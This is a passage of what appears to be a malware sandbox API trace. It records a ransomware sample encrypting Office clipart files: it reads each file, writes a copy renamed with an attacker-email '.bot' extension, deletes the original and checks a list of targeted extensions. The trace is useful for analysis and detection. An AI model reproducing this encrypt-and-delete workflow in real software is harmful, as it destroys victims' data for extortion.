	[0139.971] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1306, lpOverlapped=0x0) returned 1
	[0139.987] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1310, lpOverlapped=0x0) returned 1
	[0139.988] ReadFile (in: hFile=0x37c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.988] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.989] SetEndOfFile (hFile=0x3a0) returned 1
	[0139.989] CloseHandle (hObject=0x3a0) returned 1
	[0139.989] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.989] SetEndOfFile (hFile=0x37c) returned 1
	[0139.991] CloseHandle (hObject=0x37c) returned 1
	[0139.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.991] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf")) returned 1
	[0139.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.992] lstrlenW (lpString=".doc") returned 4
	[0139.992] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.992] lstrlenW (lpString=".docx") returned 5
	[0139.992] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.992] lstrlenW (lpString=".pdf") returned 4
	[0139.992] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.992] lstrlenW (lpString=".xls") returned 4
	[0139.992] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.992] lstrlenW (lpString=".xlsx") returned 5
	[0139.992] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.992] lstrlenW (lpString=".ppt") returned 4
	[0139.992] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.992] lstrlenW (lpString=".zip") returned 4
	[0139.992] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.992] lstrlenW (lpString=".rar") returned 4
	[0139.992] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.992] lstrlenW (lpString=".bz2") returned 4
	[0139.992] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.992] lstrlenW (lpString=".7z") returned 3
	[0139.992] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.992] lstrlenW (lpString=".dbf") returned 4
	[0139.992] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.993] lstrlenW (lpString=".1cd") returned 4
	[0139.993] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.993] lstrlenW (lpString=".jpg") returned 4
	[0139.993] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.993] lstrlenW (lpString=".doc") returned 4
	[0139.993] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.993] lstrlenW (lpString=".docx") returned 5
	[0139.993] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.993] lstrlenW (lpString=".pdf") returned 4
	[0139.993] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.993] lstrlenW (lpString=".xls") returned 4
	[0139.993] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.993] lstrlenW (lpString=".xlsx") returned 5
	[0139.993] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.993] lstrlenW (lpString=".ppt") returned 4
	[0139.993] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.993] lstrlenW (lpString=".zip") returned 4
	[0139.993] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.993] lstrlenW (lpString=".rar") returned 4
	[0139.993] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.993] lstrlenW (lpString=".bz2") returned 4
	[0139.993] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.993] lstrlenW (lpString=".7z") returned 3
	[0139.993] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.993] lstrlenW (lpString=".dbf") returned 4
	[0139.993] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.993] lstrlenW (lpString=".1cd") returned 4
	[0139.994] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63
	[0139.994] lstrlenW (lpString=".jpg") returned 4
	[0139.994] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.994] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0139.994] lstrlenW (lpString="BD05119_.WMF") returned 12
	[0139.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0140.116] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=17236) returned 1
	[0140.117] CloseHandle (hObject=0x37c) returned 1
	[0140.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf")) returned 0x20
	[0140.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.362] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.362] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.410] GetLastError () returned 0x0
	[0140.410] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4354, lpOverlapped=0x0) returned 1
	[0140.423] WriteFile (in: hFile=0x3a8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4360, lpOverlapped=0x0) returned 1
	[0140.424] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.424] WriteFile (in: hFile=0x3a8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.424] SetEndOfFile (hFile=0x3a8) returned 1
	[0140.424] CloseHandle (hObject=0x3a8) returned 1
	[0140.424] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.424] SetEndOfFile (hFile=0x398) returned 1
	[0140.430] CloseHandle (hObject=0x398) returned 1
	[0140.430] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf")) returned 1
	[0140.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.440] lstrlenW (lpString=".doc") returned 4
	[0140.440] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.440] lstrlenW (lpString=".docx") returned 5
	[0140.441] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.441] lstrlenW (lpString=".pdf") returned 4
	[0140.441] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.441] lstrlenW (lpString=".xls") returned 4
	[0140.441] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.441] lstrlenW (lpString=".xlsx") returned 5
	[0140.441] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.441] lstrlenW (lpString=".ppt") returned 4
	[0140.441] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.441] lstrlenW (lpString=".zip") returned 4
	[0140.441] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.441] lstrlenW (lpString=".rar") returned 4
	[0140.441] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.441] lstrlenW (lpString=".bz2") returned 4
	[0140.441] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.441] lstrlenW (lpString=".7z") returned 3
	[0140.441] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.441] lstrlenW (lpString=".dbf") returned 4
	[0140.441] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.441] lstrlenW (lpString=".1cd") returned 4
	[0140.441] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.441] lstrlenW (lpString=".jpg") returned 4
	[0140.441] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.441] lstrlenW (lpString=".doc") returned 4
	[0140.441] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.441] lstrlenW (lpString=".docx") returned 5
	[0140.441] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.442] lstrlenW (lpString=".pdf") returned 4
	[0140.442] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.442] lstrlenW (lpString=".xls") returned 4
	[0140.442] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.442] lstrlenW (lpString=".xlsx") returned 5
	[0140.442] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.442] lstrlenW (lpString=".ppt") returned 4
	[0140.442] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.442] lstrlenW (lpString=".zip") returned 4
	[0140.442] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.442] lstrlenW (lpString=".rar") returned 4
	[0140.442] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.442] lstrlenW (lpString=".bz2") returned 4
	[0140.442] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.442] lstrlenW (lpString=".7z") returned 3
	[0140.442] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.442] lstrlenW (lpString=".dbf") returned 4
	[0140.442] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.442] lstrlenW (lpString=".1cd") returned 4
	[0140.442] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63
	[0140.442] lstrlenW (lpString=".jpg") returned 4
	[0140.442] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.442] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.442] lstrlenW (lpString="BD08773_.WMF") returned 12
	[0140.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.443] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=24778) returned 1
	[0140.443] CloseHandle (hObject=0x388) returned 1
	[0140.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf")) returned 0x20
	[0140.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.444] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.444] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0140.445] GetLastError () returned 0x0
	[0140.445] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x60ca, lpOverlapped=0x0) returned 1
	[0140.447] WriteFile (in: hFile=0x38c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x60d0, lpOverlapped=0x0) returned 1
	[0140.448] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.448] WriteFile (in: hFile=0x38c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.448] SetEndOfFile (hFile=0x38c) returned 1
	[0140.448] CloseHandle (hObject=0x38c) returned 1
	[0140.448] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.448] SetEndOfFile (hFile=0x388) returned 1
	[0140.451] CloseHandle (hObject=0x388) returned 1
	[0140.451] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.451] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf")) returned 1
	[0140.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.452] lstrlenW (lpString=".doc") returned 4
	[0140.452] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.452] lstrlenW (lpString=".docx") returned 5
	[0140.452] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.452] lstrlenW (lpString=".pdf") returned 4
	[0140.452] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.452] lstrlenW (lpString=".xls") returned 4
	[0140.452] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.452] lstrlenW (lpString=".xlsx") returned 5
	[0140.452] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.452] lstrlenW (lpString=".ppt") returned 4
	[0140.452] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.452] lstrlenW (lpString=".zip") returned 4
	[0140.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.452] lstrlenW (lpString=".rar") returned 4
	[0140.452] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.452] lstrlenW (lpString=".bz2") returned 4
	[0140.452] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.452] lstrlenW (lpString=".7z") returned 3
	[0140.452] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.452] lstrlenW (lpString=".dbf") returned 4
	[0140.452] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.452] lstrlenW (lpString=".1cd") returned 4
	[0140.452] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.452] lstrlenW (lpString=".jpg") returned 4
	[0140.452] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.453] lstrlenW (lpString=".doc") returned 4
	[0140.453] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.453] lstrlenW (lpString=".docx") returned 5
	[0140.453] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.453] lstrlenW (lpString=".pdf") returned 4
	[0140.453] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.453] lstrlenW (lpString=".xls") returned 4
	[0140.453] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.453] lstrlenW (lpString=".xlsx") returned 5
	[0140.453] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.453] lstrlenW (lpString=".ppt") returned 4
	[0140.453] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.453] lstrlenW (lpString=".zip") returned 4
	[0140.453] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.453] lstrlenW (lpString=".rar") returned 4
	[0140.453] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.453] lstrlenW (lpString=".bz2") returned 4
	[0140.453] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.453] lstrlenW (lpString=".7z") returned 3
	[0140.453] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.453] lstrlenW (lpString=".dbf") returned 4
	[0140.453] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.453] lstrlenW (lpString=".1cd") returned 4
	[0140.453] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63
	[0140.453] lstrlenW (lpString=".jpg") returned 4
	[0140.453] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.454] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.454] lstrlenW (lpString="BD08808_.WMF") returned 12
	[0140.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.454] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=47996) returned 1
	[0140.454] CloseHandle (hObject=0x388) returned 1
	[0140.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf")) returned 0x20
	[0140.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.455] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.455] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0140.456] GetLastError () returned 0x0
	[0140.456] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xbb7c, lpOverlapped=0x0) returned 1
